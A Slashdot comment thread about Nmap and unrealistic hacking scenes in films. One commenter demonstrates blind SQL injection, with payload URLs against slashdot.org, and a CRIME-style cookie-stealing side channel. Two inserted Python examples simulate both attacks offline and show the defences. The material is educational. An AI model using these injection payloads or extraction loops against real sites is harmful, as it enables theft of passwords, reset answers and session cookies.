More Code In Movies: Nmap Meets Snowden (nmap.org)
After Saturday's story about the code samples in the new movie Arrival, an anonymous reader reminded us of this classic essay at Nmap.org:
For reasons unknown, Hollywood has decided that Nmap is the tool to show whenever hacking scenes are needed... While Nmap had been used in some previous obscure movies, it was The Matrix Reloaded which really turned Nmap into a movie star!
Nmap.org has a tradition -- the first person to notify them when new Nmap appears in a new movie wins a signed copy of Nmap Network Scanning "or a T-shirt of your choice from the Zero Day Clothing Nmap Store." (The site adds that "movie script writers, artists, and digital asset managers are also welcome to email Fyodor for advice.") And Nmap.org just added another film, Oliver Stone's new movie about Edward Snowden. In one early scene, Snowden is given a network security challenge at a CIA training class which is expected to take 5 to 8 hours. But with the help of Nmap and a custom Nmap NSE script named ptest.nse, Snowden stuns the professor by completing everything in 38 minutes!
According to the site, even the movie's trailer features Nmap. Anybody else have their own favorite stories about code in the movies?
but can nmap hack the gibson?
Someone could demand that the movies be released under the GPL
>running nmap
>what is this computer shit
>ahh, it must be
>
>code!!1
The other reason for choosing LISP is that aliens would have a better chance of understanding it. Being based on the Lambda Calculus, it represents a fundamental understanding of the theory of computation. It is likely that other intelligent species would recognize it. It's unclear that C or C++ show that any intelligent life exists on earth.
Why is Snark Required?
... a bank transfer with a progress bar that takes minutes.
In the movie Blackhat there's a screen where a hex editor is used to analyze some malware code. The hex code is just random nonsense, but the ASCII conversion contains lines from an erotic novel, with each word reversed.
Here's a screenshot:
http://imgur.com/VIWNahL
The text on the right says
Her lover one day takes O for a walk ....
in a section of the city where they never go the Montsouris Park. After they have taken a stroll in the park, and have sat together side by side on the edge of a lawn, they notice at one corner of the park, at an intersection where there are never any taxis, a car which, because
--
which comes from this:
https://archive.org/stream/The... ... O_djvu.txt
---- The devil is in my pants! Look, look!
You forgot:
*** Cracking a password one character at a time until all the characters are filled in. Nope, passwords are an all or nothing proposition.
*** Hacking/coding as a real-time activity (e.g. furiously typing code to block another hacker in real-time). Actual programmers roll their eyes here, knowing how painfully slow writing and testing code is in real life.
(albeit boring as fuck) scenes and sequences.
Aaaand, you just hit on why Hollywood doesn't show reality. Reality tends to be boring as fuck 99.9% of the time. Movies are (typically) meant to entertain people, not educate them. That tends to be a bit of a problem when idiots can't distinguish Hollywood from reality, but what are you going to do? It typically hits home when Hollywood delves into a topic that the viewer knows very well, and they leave the theater thinking "couldn't they have just asked a professional _____ about those scenes?"
Irony: Agile development has too much inertia to be abandoned now.
Well, duh, it takes a while for really large transfers. I mean, that's a lot of digital money to move through those internet pipes, right?
> ** Cracking a password one character at a time until all the characters are filled in. Nope, passwords are an all or nothing proposition.
Many attacks against passwords/keys are character-at-a-time. All types of padding oracle attacks are character-at-a-time, as are sql injection with results determined by the presence or absence of an error. (where password like 'a%'). Padding oracle attacks include POODLE and Lucky Thirteen.
> *** Hacking/coding as a real-time activity (e.g. furiously typing code to block another hacker in real-time)
I've done that, when I became aware of a breach due to what the attacker was doing at the moment, and I had only remote access so I couldn't pull the network cable.
Here's a specific example of hacking a password one character at a time, with details of how it's done.
Like most message boards, you can see my profile by going to:
slashdot.org/~raymorris
With many scripts, the profile url ends with ?userid=123
If you're a programmer, you know that's likely to be implemented with a line of code like this:
SELECT * FROM users WHERE userid='$input'
That ends up running:
SELECT * FROM users WHERE userid='raymorris'
Note that you get an error message if the username doesn't exist.
To hack someone's password, we use this URL:
slashdot.org/~raymorris'+ AND+password+LIKE+'a%
Which runs this SQL:
SELECT * FROM users WHERE userid='raymorris' AND password LIKE 'a%'
As always, if that matches a user it will show their profile. If no user is found by the SQL, the page shows an error.
We try each character until we don't get an error. Suppose "J" shows the profile. We know the first character of the password is J. So we load up:
slashdot.org/~raymorris'+ AND+password+LIKE+'Ja%
Voila, cracking passwords one character at a time. Works on many systems that have databases on the backend.
Suppose the coder is knowledgeable enough that they used salted hashes of the passwords. No problem, we just use:
slashdot.org/~raymorris'+ AND+forgot-pwd-answer+LIKE+'a%
If the site has a "forgot your password?" feature where you answer a question like "what was your first pet's name?", the name of the pet is effectively an alternate password, and it's unlikely to be hashed.
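Added example, not part of the thread above: a runnable model of the boolean-based blind SQL injection described in this comment, using an in-memory SQLite table with constructed rows (user names, a fake hash string and a pet name as the "forgot your password?" answer are all made up here). The "profile page" only answers found/not found, and the attacker recovers the pet_name column one character at a time with LIKE prefixes. The PRAGMA makes SQLite's LIKE case-sensitive so the oracle answers are as strict as the comment assumes; a parameterized version of the same lookup is included to show that the injected input simply stops matching.

```python
import sqlite3
import string

# Constructed sample rows (not data from any real site).
USERS = [
    ("raymorris", "$2b$12$fakehashfakehashfakehash", "Fluffy"),
    ("alice", "$2b$12$anotherfakehashvalue00000", "Rex2"),
]


def build_db():
    conn = sqlite3.connect(":memory:")
    # SQLite's LIKE is case-insensitive for ASCII by default; turn that off so
    # 'F%' and 'f%' are distinguishable, as the comment's walk-through assumes.
    conn.execute("PRAGMA case_sensitive_like = ON")
    conn.execute(
        "CREATE TABLE users (userid TEXT, password_hash TEXT, pet_name TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def profile_exists(conn, user_input):
    """The vulnerable profile page: the URL parameter is concatenated into the
    query (deliberately, to model the comment) and the only thing the caller
    learns is whether a row came back.  That yes/no answer is the oracle."""
    sql = f"SELECT userid FROM users WHERE userid='{user_input}'"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # a broken query renders the same 'not found' error page


def recover_column(conn, victim, column,
                   alphabet=string.ascii_letters + string.digits, max_len=32):
    """Boolean-based blind SQLi: extend a known prefix by one character per
    round, exactly as the comment describes ('a%', then 'Ja%', ...)."""
    prefix = ""
    for _ in range(max_len):
        # No trailing wildcard: does the prefix already equal the whole value?
        if profile_exists(conn, f"{victim}' AND {column} LIKE '{prefix}"):
            return prefix
        for c in alphabet:
            if profile_exists(conn, f"{victim}' AND {column} LIKE '{prefix}{c}%"):
                prefix += c
                break
        else:
            # Next character is outside the alphabet ('%' and '_' are LIKE
            # wildcards and would need escaping); give up on this value.
            return None
    return prefix


def profile_exists_safe(conn, user_input):
    """The fix: a bound parameter is data, never SQL, so the payload above is
    just an unknown user name."""
    sql = "SELECT userid FROM users WHERE userid=?"
    return conn.execute(sql, (user_input,)).fetchone() is not None


if __name__ == "__main__":
    db = build_db()
    print("pet_name for raymorris:", recover_column(db, "raymorris", "pet_name"))
    print("same payload, parameterized:",
          profile_exists_safe(db, "raymorris' AND pet_name LIKE 'F%"))
```

Each recovered character costs at most len(alphabet) requests, so an eight-character answer falls in a few hundred page loads rather than the alphabet-to-the-eighth guesses a real brute force would need; that difference is the whole point of the "one character at a time" pattern.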
*** "enhance!" (+ rinse and repeat) to blow up a single pixel of a reflection in a car's side mirror captured by a fuzzy analog security cam into a glorious full hd image.. nope. that's even worse
Turns out that one's kind of working now.
https://github.com/alexjc/neur...
It's ok if the results are printed using Kryten's butt printer... then you're really pulling it out of someone's ass.
...if you can read this, you have too much education...
That scene was entertaining.
I think I was unclear. I'm NOT talking about brute force. I'm talking about finding the first character, then several seconds later cracking the second character, then several more seconds to get the third character, etc. Here's a step by step for one easy example, a boolean return SQLi:
https://slashdot.org/comments....
Padding oracle attacks are the same - you find the first character, then you find the second character, etc. Here's a rough description of one other similar example:
As is/was common for https traffic, the traffic is compressed with gzip and then encrypted. This string compresses well:
Cookie:abcabcabc
This one compresses poorly:
Cookie:abfkdgrkdgs
Assume the cookie is an access cookie for your bank. Seeing the encrypted traffic, I can't read it, but I can see how big it is. Using Javascript, I put an img tag on our web page for each of these URLs:
bank.com/Cookie:a
bank.com/Cookie:b
bank.com/Cookie:c
Your browser creates, compresses, and encrypts the following requests:
Get /Cookie:a
Cookie:bfjshdhd
Get /Cookie:b
Cookie:bfjshdhd
Get /Cookie:c
Cookie:bfjshdhd
Since they are encrypted I, as an attacker can't read the requests to get your session cookie. However I can see how big the request is, after compression. You'll notice the second request contains the repeated string "Cookie:b". Since it's an exact repeat, it will compress better than the others, and I as an attacker now know the first character of your authentication cookie. My Javascript then repeats with:
Get /Cookie:ba
Cookie:bfjshdhd
Get /Cookie:bb
Cookie:bfjshdhd
Get /Cookie:bc ...
Cookie:bfjshdhd
Voila, I get your authentication cookie (effectively a password) one character at a time.
Yes, I do hack banks and other "secure" sites for a living.
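Added example, not part of the thread above: an offline simulation of the compression side channel this comment describes (the CRIME-style attack). The secret cookie, the Host name and the header name are constructed for the demo; the attacker controls only the request path and sees only the size of the compressed request, which is all that stream-cipher or TLS encryption would leak anyway, so the ciphertext step is omitted. Real DEFLATE output with zlib's default dynamic Huffman tables is noisier than the comment's description, and published attacks need extra tricks to cope; this demo forces fixed Huffman codes (zlib's Z_FIXED strategy) so that each correctly guessed byte removes exactly one 8-bit literal and the shortest request is unambiguous.

```python
import string
import zlib

# Constructed victim secret.  The attacker code below never reads it directly.
SECRET_COOKIE = "7h2kq9xw"
# Header prefix the attacker can echo into the path to seed the LZ77 match.
MARKER = "Cookie: session_id="


def build_request(path):
    """The victim's browser assembles this request; the attacker picks only
    `path` (e.g. via an <img> tag on a page the victim visits)."""
    return (
        f"GET /{path} HTTP/1.1\r\n"
        f"Host: bank.example\r\n"
        f"{MARKER}{SECRET_COOKIE}\r\n\r\n"
    ).encode()


def observed_length(path):
    """What a network attacker sees: the compressed size of the request.
    Compress-then-encrypt preserves length, so this number leaks through.
    Z_FIXED forces static Huffman codes so every ASCII literal costs 8 bits
    and a correct guess shortens the output by exactly one byte."""
    comp = zlib.compressobj(9, zlib.DEFLATED, 15, 9, zlib.Z_FIXED)
    return len(comp.compress(build_request(path)) + comp.flush())


def recover_cookie(alphabet=string.ascii_lowercase + string.digits, max_len=32):
    """CRIME-style recovery: in each round, inject MARKER + known + c for every
    candidate c and keep the one whose request compresses uniquely smallest.
    When every candidate compresses equally, no further byte of the cookie
    matches the injected text, so the secret has been fully recovered."""
    known = ""
    for _ in range(max_len):
        sizes = {c: observed_length(MARKER + known + c) for c in alphabet}
        best = min(sizes.values())
        winners = [c for c, n in sizes.items() if n == best]
        if len(winners) != 1:
            break
        known += winners[0]
    return known


if __name__ == "__main__":
    print("wrong guess :", observed_length(MARKER + "a"), "bytes")
    print("right guess :", observed_length(MARKER + SECRET_COOKIE[0]), "bytes")
    print("recovered   :", recover_cookie())
```

Each round costs one request per alphabet character, so the eight-byte cookie falls in a few hundred requests; the defence is not a better cipher but refusing to compress attacker-controlled input alongside secrets (TLS-level compression was disabled in browsers for exactly this reason).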
Try reading the post before criticizing it and you might not make a complete fool out of yourself again. Try reading the last three sentences or so starting with "if the password is hashed".
mame was in godzilla 2000
I hate when they "type" code sequentially, top to bottom in a single stream. Sure, you might write a stupid simple shell script that way, but not C, C++, or Java.
John
We already have the Wilhelm scream that has appeared in countless movies as a kind of insider joke/cameo (including all Star Wars movies to date), so why not have the "Fyodor Code" as well?
UNIX? They're not even circumcised! Savages!
Someone cared.
In Visual Basic.
I knew I needed to stop reading Slashdot and finish my PhD when I started to miss articles by Bennett Haselton.
I had a pleasant time in line doing a code review.
Moss is that you?
lucm, indeed.
dongles
TRIGGER WARNING PLEASE
Showing a program operate almost certainly does not make that movie a derivative work...
Yeah and never a single copy-paste from StackOverflow.
The attack I just described gets the cookie, it doesn't require CSRF, and will get the cookie for most any site.
Note the URLs used are all 404, they don't exist. CSRF would be causing the browser to load a legitimate and important URL like change-password.php?newpass=hacked
I have not seen the movie but a bank transfer with a progress bar that takes minutes does not sound unrealistic. Banking systems are highly distributed and need a high level of assurance/consistency. Not so long ago an actual (inter-bank) transfer (e.g. within Germany) would only be done overnight, hours after it had been booked internally. The progress bar could represent all the different synchronization steps ...
Most of the time, when they want to show something "happening" it always seems like it is one of the following:
1. Cat of some text file, log or source code on a semi transparent console window
2. Custom script of output text (hello world type of thing) also on the transparent console window
3. Some custom GUI using Tk or Qt windows that open and close very fast and at least one progress bar
4. A map that zooms in/out
5. An image or video
Also, during any of these, the "hacker" is seen to be typing away madly at the keyboard but somehow doesn't seem to be using any key modifiers (CTRL, ALT, SHIFT) and doesn't appear to be directly affecting anything seen on the screen.
I am also amazed that people who are pressed for time (the owner of the computer is about to walk in the door) always seem to know exactly what they are doing even though they have (presumably) never seen this computer/software. I know if it was me, I would go to put in my USB thumb drive and find that the IT staff hot glued the port or the local AV is blocking the file transfer or it is a USB-C and I don't have an adapter so I try to e-mail it to myself but the e-mail program is password protected so I try to use web based mail, but my 2FA blocks access from this device so I have to dig out my phone, but I have no service so I try to connect to an open WiFi hotspot, but there is something wrong with it and I am not getting an IP address or the authentication gateway is broken..... and I'm caught by the guy walking in the door....
My eyes reflect the stars and a smile lights up my face.
What? Don't guns always make ktcht sounds whenever moved more than 2 centimeters in any direction?
If you're wondering how he eats and breathes And other science facts, Just repeat to yourself "It's just a show, I should really just relax ...
If it was in the 80's, maybe. All those transfers were sent to the fed via (hardware encrypted) 56k lines. So it might've actually taken 10sec.
sun4m (M as in monkey, not U) and it also says "i386". So which is it? (very likely the latter) And it's clearly linux from the obscured names in the process list.